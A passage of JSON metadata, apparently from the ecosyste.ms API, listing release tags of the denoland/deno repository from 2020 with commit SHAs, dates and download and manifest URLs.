:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno